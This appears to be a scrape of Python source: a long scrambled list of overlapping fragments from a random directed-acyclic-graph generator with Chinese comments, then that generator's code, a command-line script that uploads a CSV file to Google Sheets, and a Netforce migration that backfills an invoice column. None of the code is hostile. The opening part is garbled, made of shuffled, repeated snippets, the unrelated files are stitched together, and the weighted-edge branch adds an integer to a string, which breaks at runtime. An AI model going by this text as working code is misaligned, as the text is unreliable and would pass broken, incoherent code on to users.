weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0", "False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i in", "random import numpy import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self,", "self.matr = numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected", "weighted=False, trim=True): \"\"\" n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed", "False: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) else: return", "图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed 有向性 connected 连通性 loop", "False: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) else: return", "j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i", "else:#点从0开始 if self.weighted == False: return str(self.edges[i][0]) + \" \"", "directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数 m 图中边的个数", "\" + str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if self.weighted ==", "GetEdge(self, i): if self.trim:#点从1开始 if self.weighted == False: return str(self.edges[i][0]+1)", "range(n): for j in range(n): if self.matr[i][j]==1: e = (i,", "in range(n): if self.matr[i][j]==1: e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\"", "= connected self.loop = loop self.trim = trim if directed==True", "self.loop = loop self.trim = trim if directed==True and connected=='weak'", "= random.randint(0, mid) end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] !=", "temp[j][i]==1: temp[i][j]=1 for i in 
range(self.n-1): if i==0: result =", "+ str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if self.weighted == False:", "def RandomGenerTopoEdges(self, edge_num): for i in range(edge_num): mid = random.randint(1,", "\" \" + str(self.edges[i][1]) else: return str(self.edges[i][0]) + \" \"", "edge_weight 边的权值上限 directed 有向性 connected 连通性 loop 有环性 weighted 带权性", "str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) +", "\" \" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \" \"", "+ str(self.edges[i][1]) else: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1])", "weighted self.connected = connected self.loop = loop self.trim = trim", "directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n = n self.m =", "in range(n): for j in range(n): if self.matr[i][j]==1: e =", "mid) end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid", "loop==False:#弱连通有向无环 self.n = n self.m = m self.matr = numpy.zeros((n,", "= directed self.weighted = weighted self.connected = connected self.loop =", "connected='weak', loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数 m 图中边的个数 edge_weight", "loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限", "temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i in range(self.n-1): if", "elif temp[j][i]==1: temp[i][j]=1 for i in range(self.n-1): if i==0: result", "for i in range(self.n): for j in range(self.n): if result[i][j]==0", "self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1, self.n-2) st", "else: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) + random.randint(1,", "= random.randint(0, mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1", "= 0 for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count", "result = result.dot(temp) for i in range(self.n): for j in", "st = random.randint(0, mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] =", "m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数", "in range(edge_num): mid = random.randint(1, self.n-2) st = random.randint(0, mid)", "+ random.randint(1, edge_weight) else:#点从0开始 if self.weighted == False: return str(self.edges[i][0])", "for i in range(self.n): for j in range(self.n): if temp[i][j]==1:", "= (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr)", "return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i in range(edge_num):", "i in range(self.n-1): if i==0: result = temp.dot(temp) else: result", "st = random.randint(0, mid) end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]]", "self.trim:#点从1开始 if self.weighted == False: return str(self.edges[i][0]+1) + \" \"", "True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i in range(edge_num): mid", "n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if", "== False: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) else:", "连通性 loop 有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed", "range(self.n): if result[i][j]==0 and i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\"", 
"return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1)", "range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i in", "copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1, directed=True,", "\"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False,", "if directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n = n self.m", "!= 0: mid = random.randint(1, self.n-2) st = random.randint(0, mid)", "def __init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True):", "self.n-2) st = random.randint(0, mid) end = random.randint(mid+1, self.n-1) while", "return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) else: return str(self.edges[i][0])", "range(edge_num): mid = random.randint(1, self.n-2) st = random.randint(0, mid) end", "random.randint(0, mid) end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0:", "def GetEdge(self, i): if self.trim:#点从1开始 if self.weighted == False: return", "return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) + random.randint(1, edge_weight)", "self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1, self.n-2) st = random.randint(0,", "self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for", "\" \" + str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if self.weighted", "0 for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count =", "True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed self.weighted = weighted self.connected", "self.n-2) st = random.randint(0, mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]]", "if i==0: result = temp.dot(temp) else: result = result.dot(temp) for", "= trim if directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n =", "if self.matr[i][j]==1: e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self):", "i in range(edge_num): mid = random.randint(1, self.n-2) st = random.randint(0,", "mid = random.randint(1, self.n-2) st = random.randint(0, mid) end =", "+ \" \" + str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \"", "i in range(n): for j in range(n): if self.matr[i][j]==1: e", "e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp =", "random.randint(1, edge_weight) else:#点从0开始 if self.weighted == False: return str(self.edges[i][0]) +", "\" + str(self.edges[i][1]) else: return str(self.edges[i][0]) + \" \" +", "self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i in range(n): for j", "temp = copy.deepcopy(self.matr) for i in range(self.n): for j in", "trim=True): \"\"\" n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed 有向性", "and i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num):", "numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity()", "j in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for", "and loop==False:#弱连通有向无环 self.n = n self.m = m self.matr =", "result = temp.dot(temp) else: result = result.dot(temp) for i in", 
"self.directed = directed self.weighted = weighted self.connected = connected self.loop", "str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) else: return str(self.edges[i][0]) +", "False:点编号从0开始 \"\"\" self.directed = directed self.weighted = weighted self.connected =", "CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i in range(self.n): for j", "return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def RandomGenerTopoEdges(self, edge_num): for i", "i): if self.trim:#点从1开始 if self.weighted == False: return str(self.edges[i][0]+1) +", "random.randint(0, mid) end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\"", "in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges", "directed 有向性 connected 连通性 loop 有环性 weighted 带权性 trim True:点编号从1开始", "self.edges = list() for i in range(n): for j in", "\"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始 if self.weighted == False:", "Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False,", "self.matr[i][j]==1: e = (i, j) self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp", "in range(self.n): if result[i][j]==0 and i!=j: return False return True", "list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else:", "import numpy import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n,", "connected 连通性 loop 有环性 weighted 带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\"", "self.trim = trim if directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n", "= loop self.trim = trim if directed==True and connected=='weak' and", "\"\"\" self.directed = directed self.weighted = weighted self.connected = connected", "in range(self.n): for j in range(self.n): if temp[i][j]==1: temp[j][i]=1 elif", "self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始 if", "edge_weight) else:#点从0开始 if self.weighted == False: return str(self.edges[i][0]) + \"", "random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if", "= weighted self.connected = connected self.loop = loop self.trim =", "带权性 trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed self.weighted =", "connected=='weak' and loop==False:#弱连通有向无环 self.n = n self.m = m self.matr", "trim True:点编号从1开始 False:点编号从0开始 \"\"\" self.directed = directed self.weighted = weighted", "图中边的个数 edge_weight 边的权值上限 directed 有向性 connected 连通性 loop 有环性 weighted", "import random import numpy import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def", "n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\" n", "self.connected = connected self.loop = loop self.trim = trim if", "weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0 for i in range(n-1):", "for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1", "in range(self.n): for j in range(self.n): if result[i][j]==0 and i!=j:", "self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始", "in range(self.n-1): if i==0: result = 
temp.dot(temp) else: result =", "+ \" \" + str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始 if", "self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected: self.RandomGenerTopoEdges(n-1) else: count =", "if result[i][j]==0 and i!=j: return False return True \"\"\"在图中随机生成edge_num条边\"\"\" def", "temp.dot(temp) else: result = result.dot(temp) for i in range(self.n): for", "= temp.dot(temp) else: result = result.dot(temp) for i in range(self.n):", "= 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i): if self.trim:#点从1开始 if self.weighted", "n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed 有向性 connected 连通性", "= random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1,", "random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid = random.randint(1, self.n-2)", "if temp[i][j]==1: temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i in range(self.n-1):", "== False: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1]) else:", "count = 0 for i in range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1", "0: mid = random.randint(1, self.n-2) st = random.randint(0, mid) end", "return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) + random.randint(1, edge_weight)", "temp[j][i]=1 elif temp[j][i]==1: temp[i][j]=1 for i in range(self.n-1): if i==0:", "trim if directed==True and connected=='weak' and loop==False:#弱连通有向无环 self.n = n", "for j in range(n): if self.matr[i][j]==1: e = (i, j)", "+ str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1)", "list() for i in range(n): for j in range(n): if", "range(self.n-1): if i==0: result = temp.dot(temp) else: result = result.dot(temp)", "range(self.n): for j in range(self.n): if result[i][j]==0 and i!=j: return", "m 图中边的个数 edge_weight 边的权值上限 directed 有向性 connected 连通性 loop 有环性", "+ \" \" + str(self.edges[i][1]) else: return str(self.edges[i][0]) + \"", "边的权值上限 directed 有向性 connected 连通性 loop 有环性 weighted 带权性 trim", "connected self.loop = loop self.trim = trim if directed==True and", "class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1, directed=True, connected='weak',", "import copy class Graph: \"\"\"n表示图中点的个数,m表示图中边的个数\"\"\" def __init__(self, n, m, edge_weight=1,", "temp[i][j]=1 for i in range(self.n-1): if i==0: result = temp.dot(temp)", "for i in range(edge_num): mid = random.randint(1, self.n-2) st =", "self.weighted == False: return str(self.edges[i][0]) + \" \" + str(self.edges[i][1])", "self.m = m self.matr = numpy.zeros((n, n)) self.topo = list(range(n))", "range(n-1): if self.matr[self.topo[i]][self.topo[i+1]]!=1: self.matr[self.topo[i]][self.topo[i+1]]=1 count = count+1 self.RandomGenerTopoEdges(n-1-count) self.edges =", "str(self.edges[i][1]+1) else: return str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) +", "m self.matr = numpy.zeros((n, n)) self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1))", "self.edges.append(e) \"\"\"检查图的弱连通性\"\"\" def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i in", "= count+1 self.RandomGenerTopoEdges(n-1-count) self.edges = list() for i in range(n):", "\"\"\" n 图中点的个数 m 图中边的个数 edge_weight 边的权值上限 directed 有向性 connected", "def CheckWeakConnectivity(self): temp = copy.deepcopy(self.matr) for i in range(self.n): for", "if self.trim:#点从1开始 if self.weighted == False: return 
str(self.edges[i][0]+1) + \"", "self.RandomGenerTopoEdges(n-1) else: count = 0 for i in range(n-1): if", "i in range(self.n): for j in range(self.n): if temp[i][j]==1: temp[j][i]=1", "self.topo = list(range(n)) random.shuffle(self.topo) self.RandomGenerTopoEdges(m-(n-1)) weak_connected = self.CheckWeakConnectivity() if weak_connected:", "j in range(n): if self.matr[i][j]==1: e = (i, j) self.edges.append(e)", "str(self.edges[i][0]+1) + \" \" + str(self.edges[i][1]+1) + random.randint(1, edge_weight) else:#点从0开始", "copy.deepcopy(self.matr) for i in range(self.n): for j in range(self.n): if", "= random.randint(1, self.n-2) st = random.randint(0, mid) end = random.randint(mid+1,", "for i in range(n): for j in range(n): if self.matr[i][j]==1:", "end = random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self,", "if weak_connected: self.RandomGenerTopoEdges(n-1) else: count = 0 for i in", "= random.randint(mid+1, self.n-1) self.matr[self.topo[st]][self.topo[end]] = 1 \"\"\"以字符串返回第i条边的信息\"\"\" def GetEdge(self, i):", "end = random.randint(mid+1, self.n-1) while self.matr[self.topo[st]][self.topo[end]] != 0: mid =", "edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True): \"\"\" n 图中点的个数 m" ]
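A minimal usage sketch for the Graph class above: generate a random weakly-connected DAG with 6 vertices and 9 edges and print its edge list. The seed value is an arbitrary choice for reproducibility.

import random

random.seed(42)  # make the generated graph reproducible
g = Graph(6, 9)
print(len(g.edges), "edges")  # exactly m edges are generated
for i in range(len(g.edges)):
    print(g.GetEdge(i))  # "u v" pairs, 1-based because trim=True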
[ "to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import", "to write data from csv to G Sheets.\"\"\" cli_args =", "write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from", "module provides a console interface to convert CSV to Google", "csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file import", "the flow of operations to write data from csv to", "parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def main(): \"\"\"Control the flow", "a console interface to convert CSV to Google Sheets.\"\"\" from", "convert CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from", "main(): \"\"\"Control the flow of operations to write data from", "auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, )", "from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet", "auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from", "from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file", "provides a console interface to convert CSV to Google Sheets.\"\"\"", "= parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service =", "parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json)", "build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service,", "CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet", "create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if __name__ ==", "import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet", "import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args", "csv2googlesheets.parse_cli_args import parse_cli_args def main(): \"\"\"Control the flow of operations", "build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def", "def main(): \"\"\"Control the flow of operations to write data", "to G Sheets.\"\"\" cli_args = parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title", "Sheets.\"\"\" cli_args = parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv)", "interface to convert CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import", "import create_sheet from csv2googlesheets.gapi_write_to_sheet import 
write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title", "csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import", "from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def main():", "spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if", "data from csv to G Sheets.\"\"\" cli_args = parse_cli_args() values", "create_sheet from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from", "of operations to write data from csv to G Sheets.\"\"\"", "flow of operations to write data from csv to G", "csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import", "parse_cli_args def main(): \"\"\"Control the flow of operations to write", "import parse_cli_args def main(): \"\"\"Control the flow of operations to", "write data from csv to G Sheets.\"\"\" cli_args = parse_cli_args()", "google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id,", "Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from", "operations to write data from csv to G Sheets.\"\"\" cli_args", "G Sheets.\"\"\" cli_args = parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title =", "to convert CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google", "csv to G Sheets.\"\"\" cli_args = parse_cli_args() values = parse_file(path=cli_args.csv)", "spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title)", "values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id", "= create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if __name__", "= auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values,", "import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def main(): \"\"\"Control the", "from csv to G Sheets.\"\"\" cli_args = parse_cli_args() values =", "= parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id =", "write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if __name__ == '__main__': main()", "<filename>csv2googlesheets/to_google_sheets.py \"\"\"This module provides a console interface to convert CSV", "cli_args = parse_cli_args() values = parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service", "parse_file(path=cli_args.csv) spreadsheet_title = build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) 
spreadsheet_id = create_sheet(google_service,", "csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet from csv2googlesheets.gapi_write_to_sheet import", "csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args import parse_cli_args def main(): \"\"\"Control", "= build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet(", "\"\"\"This module provides a console interface to convert CSV to", "from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file", "\"\"\"Control the flow of operations to write data from csv", "import write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file", "spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if __name__ == '__main__':", "console interface to convert CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization", "from csv2googlesheets.parse_cli_args import parse_cli_args def main(): \"\"\"Control the flow of", "from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args", "Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet" ]
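The script reads two values from the command line, `cli_args.csv` and `cli_args.credentials_json`. The real parser lives in csv2googlesheets/parse_cli_args.py and is not shown here; the sketch below is a hypothetical stand-in built with argparse, using the two attribute names the main() flow depends on.

import argparse


def parse_cli_args():
    # Hypothetical reconstruction: only the attribute names 'csv' and
    # 'credentials_json' are known from the calling code above.
    parser = argparse.ArgumentParser(
        description='Convert a CSV file to a Google Sheets spreadsheet.')
    parser.add_argument('csv', help='Path to the source CSV file.')
    parser.add_argument(
        'credentials_json',
        help='Path to the Google API credentials JSON file.')
    return parser.parse_args()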
[ "netforce.model import get_model from netforce import migration from netforce import", "Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain", "amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS NOT NULL\")", "import get_model from netforce import migration from netforce import database", "import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE", "db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND", "netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection()", "_name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE", "_version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur", "class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET", "get_model from netforce import migration from netforce import database class", "SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS NOT", "from netforce.model import get_model from netforce import migration from netforce", "account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS", "def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS", "WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS NOT NULL\") Migration.register()", "from netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self):", "db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain", "migration from netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def", "netforce import migration from netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\"", "import migration from netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\"", "migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL", "database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice", "<reponame>nfco/netforce<gh_stars>10-100 from netforce.model import get_model from netforce import migration from", "from netforce import migration from netforce import database 
class Migration(migration.Migration):" ]
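Because the UPDATE only touches rows where the new column is still NULL, running the migration twice is a no-op the second time, which is the property you want from schema backfills. A self-contained sketch of the same idempotent pattern, using sqlite3 purely for illustration (Netforce runs on its own database layer):

import sqlite3

# Throwaway table with the same two columns as the migration above.
db = sqlite3.connect(':memory:')
db.execute('CREATE TABLE account_invoice ('
           'amount_credit_remain REAL, amount_credit_remain_cur REAL)')
db.executemany(
    'INSERT INTO account_invoice VALUES (?, ?)',
    [(100.0, None), (50.0, 25.0), (None, None)])

# The backfill: only NULL targets with a non-NULL source are copied.
db.execute(
    'UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain '
    'WHERE amount_credit_remain_cur IS NULL '
    'AND amount_credit_remain IS NOT NULL')

print(db.execute(
    'SELECT amount_credit_remain, amount_credit_remain_cur '
    'FROM account_invoice').fetchall())
# [(100.0, 100.0), (50.0, 25.0), (None, None)] -- re-running changes nothing.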
